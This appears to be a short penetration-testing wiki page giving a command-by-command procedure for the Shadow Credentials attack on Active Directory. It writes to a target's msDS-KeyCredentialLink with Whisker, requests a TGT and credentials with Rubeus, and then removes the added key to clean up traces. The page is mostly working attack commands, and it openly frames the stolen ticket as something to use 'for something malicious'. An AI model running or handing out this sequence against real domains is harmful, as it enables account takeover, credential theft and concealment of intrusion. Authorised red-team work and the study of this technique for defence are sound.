Shadow credentials - CraigDonkin/Infrastructure GitHub Wiki

This technique requires the following:

  • At least one Windows Server 2016 Domain Controller.

  • A digital certificate for Server Authentication installed on the Domain Controller.

  • Windows Server 2016 Functional Level in Active Directory.

  • Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.

  • High level overview of attack is you write to msDS-KeyCredentialLink attribute of the target attribute and add shadow credentials for that account.

    • Shadow credential

  • Then the target account is used to retrieve it's TGT.

  • Then use the TGT for something malicious.

Step One - Whisker

https://github.com/eladshamir/Whisker

  • List keys that are already present for a target.
Whisker.exe list /target:<target>
  • Add a new key pair to the target:
whisker.exe add /target:<target>
  • Confirm the msDS-KeyCredentialLink was written to:
get-netcomputer <target>

Step two - Rubeus

  • Run the Rubeus command detailed by Whisker
Rubeus.exe asktgt /user:<target> /certificate:<certificate> /password:<password> /domain:<domain> /dc:<dc> /getcredentials /show /nowrap

Step three - Clean up

  • Get the deviceID:
Whisker.exe list /target:<target>
  • Remove it:
Whisker.exe remove /target:<target> /deviceid:<deviceid>
⚠️ **GitHub.com Fallback** ⚠️